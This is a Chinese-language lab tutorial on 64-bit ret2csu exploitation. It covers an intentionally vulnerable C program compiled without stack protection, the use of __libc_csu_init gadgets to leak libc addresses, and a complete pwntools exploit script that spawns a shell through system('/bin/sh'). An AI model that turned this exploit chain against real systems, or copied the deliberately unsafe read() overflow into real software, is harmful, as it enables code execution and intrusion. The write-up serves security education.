针对一些程序运行时的初始化函数(如加载libc.so的初始化函数),提取一些通用的gadgets,从而更利于我们继续ROP操作。
这次实验的可执行文件文件通过我们自己编译一个程序产生,为了降低实验的难度,我们在进行编译的时候,关闭栈保护和数据执行保护(DEP)。
#include
#include
#include
void vulnerable_function() {
char buf[128];
read(STDIN_FILENO, buf, 512);
}
int main(int argc, char** argv) {
write(STDOUT_FILENO, "Hello, World\n", 13);
vulnerable_function();
}
上面level5.c的代码。
gcc -fno-stack-protector -z execstack -o level5 level5.c
我们用上面level5.c进行编译生成可执行文件level5,-fno-stack-protector和-z execstack这两个参数会分别关掉DEP(数据执行保护)和Stack Protector(栈保护)。
首先对level5进行检测,看看有没有保护机制
发现堆栈是no canary found ,所以我们可以进行栈溢出。
对我们生成的level用IDA进行静态分析找出栈溢出点
利用gdb对level5进行动态调试,找出从输入点到ret地址,即我们需要填充的字符数。
我们需要填充的字符数为(0x80+0x08)(因为我们这次用的是64位不是32位)。
然后,我们使用ROPGadget搜索一下level5中所有pop ret的gadgets
ROPgadget --binary ./level5 --only "pop|ret"
虽然该实验我们还是利用上个实验中从libc表中查找system和bin/sh,原程序使用了write()和read()函数,我们可以通过write()去输出write.got的地址,从而计算出libc在内存中的地址。但是该执行文件是64位而不是32位,32位可以直接采用上个实验的方法。但是64位就不行?因为64位和32位的传参方式发生了改变 。因为64位下前6个参数不是保存在栈中,而是通过寄存器传值。
在这里我们分析一下32位与64位的不同?
1、32位程序使用栈传参。对于32位程序,逻辑地址是从0~2^32。
2、64位程序传前六个参数使用寄存器,之后所有参数使用栈传。对于64位程序,逻辑地址是从0~2^64。
因为32位与64位程序的不同,相应的ROP方式我们也进行了改变。在原来的32位程序中我们会直接将目标函数的入口地址和相应的参数放在payload中,最后进行rop时,参数是根据与ebp的相对位置来进行确定的。而在64位程序中,我们不仅要将目标函数的入口地址和相应参数放在payload中,同时还要插入一些gadget,将参数放入相应的寄存器中,从而达到传参的目的。
现在开始编写payload脚本
上面的elf.address是elf的基址,是通过IDA分析出来的
通过对IDA进行静态分析,我们在这里介绍一下通用的gadgets。
对上面的汇编代码进行分析,先分析6次pop的地方(我们不妨将6次pop的地址记为pop_6)
pop rbx //为了减小后面利用难度,将rbx取值为0
pop rbp //将rbp取值为1,通过检测,使检验避过。
pop r12 //这里存放我们最后跳转目标函数地址
pop r13 //传入第一个参数
pop r14 //第二个参数
pop r15 //第三个参数
retn
我们将6次pop中的ret的值设为下面汇编的地址(我们不妨将下面汇编的地址记为mov_3)
mov rdx, r15
mov rsi, r14
mov edi, r13d
call qword ptr [r12+rbx*8]
add rbx, 1
cmp rbp, rbx
jnz short loc_5555555546F0
我们将r15的值赋值给rdx,,r14的值赋值给rsi,r13的值赋值给edi,随后就会调用call qword ptr [r12+rbx8]。这时候我们只要再将rbx的值赋值为0,再通过精心构造栈上的数据,我们就可以控制pc去调用我们想要调用的函数了(比如说write函数)。执行完call qword ptr [r12+rbx8]之后,程序会对rbx+=1,然后对比rbp和rbx的值,如果相等就会继续向下执行并ret到我们想要继续执行的地址。所以为了让rbp和rbx的值相等,我们可以将rbp的值设置为1,因为之前已经将rbx的值设置为0了。
所以payload为
payload = 'a'*0x88+p64(pop_6)
payload+=p64(0)+p64(1)+p64(elf.got['write'])+p64(8)+p64(elf.got['write'])+p64(1)
payload+=p64(mov_3)+'a'*(8*7)+p64(main)
write规定传入的第一个参数对应r13,在mov_3处是将r13给edi,所以传入泄露的字节数,只需要泄露8个字节即可。第二个参数对应r14,在mov_3处是将r14给rsi,为要泄露的位置,因为got表中存的是地址而plt表中存的是指令,无法进行call操作,所以第二个参数为write在got表中的地址。第三个参数对应r15,在mov_3处是将r15给rdx,所以第三个参数为1。a*(8*7),还是继续覆盖栈上的数据,直到把返回值覆盖成目标函数的main函数,最后跳至main函数。
write=u64(p.recv(8).ljust(8,'\x00'))
print hex(write)
libc=LibcSearcher('write',write)
libcbase=write-libc.dump('write')
system=libcbase+libc.dump('system')
bin_sh=libcbase+libc.dump('str_bin_sh')
我们通过write在内存上的地址,泄露出libc表的基址,最终泄露出system和bin_sh。
payload='a'*0x88+p64(0x0000000000400623+elf.address)+p64(bin_sh)+p64(system)
因为后面的输入点是以ebp为定位的,这与ret的位置的距离是固定的。然后需要传参,在64位上传参,我们传的第一个参数是rdi,但是在上面我们找到的gadgets是一个偏移量,所以还需要加上一个基址。所以用’a’进行覆盖栈后,将gadgets的值写入到ret位置,这样我们就能跳转至pop rdi;ret;地址处,先进行pop操作,把bin_sh给pop出来,赋给rdi。再进行ret操作,此时ret上的地址为system的地址,所以我们就能进行system(bin_sh)的操作。这样,我们就能getshell。
最后附上exp.py
#!python
#!/usr/bin/env python
from pwn import *
from LibcSearcher import *
context.log_level='debug'
context.terminal=['gnome-terminal','-x','sh','-c']
p = process('./level5')
elf = ELF('./level5')
#p = remote('127.0.0.1',10001)
pop_6 = 0x000000000040061A
mov_3 = 0x0000000000400600
main = 0x0000000000400587
elf.address=0x0000000000400000
payload = 'a'*(0x80+0x08)+p64(pop_6)
payload += p64(0)+p64(1)+p64(elf.got['write'])+p64(8)+p64(elf.got['write'])+p64(1)
payload += p64(mov_3) + 'a'*(8*7)+p64(main)
#pwnlib.gdb.attach(p)
p.recvuntil("World\n")
p.sendline(payload)
write=u64(p.recv(8).ljust(8,'\x00'))
print hex(write)
libc=LibcSearcher('write',write)
libcbase=write-libc.dump('write')
system=libcbase+libc.dump('system')
bin_sh=libcbase+libc.dump('str_bin_sh')
payload='a'*0x88+p64(0x0000000000400623+elf.address)+p64(bin_sh)+p64(system)
p.recvuntil('\n')
p.sendline(payload)
p.interactive()
'''0x000000000040061c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040061e : pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400620 : pop r14 ; pop r15 ; ret
0x0000000000400622 : pop r15 ; ret
0x000000000040061b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040061f : pop rbp ; pop r14 ; pop r15 ; ret
0x00000000004004d0 : pop rbp ; ret
0x0000000000400623 : pop rdi ; ret
0x0000000000400621 : pop rsi ; pop r15 ; ret
0x000000000040061d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400419 : ret
'''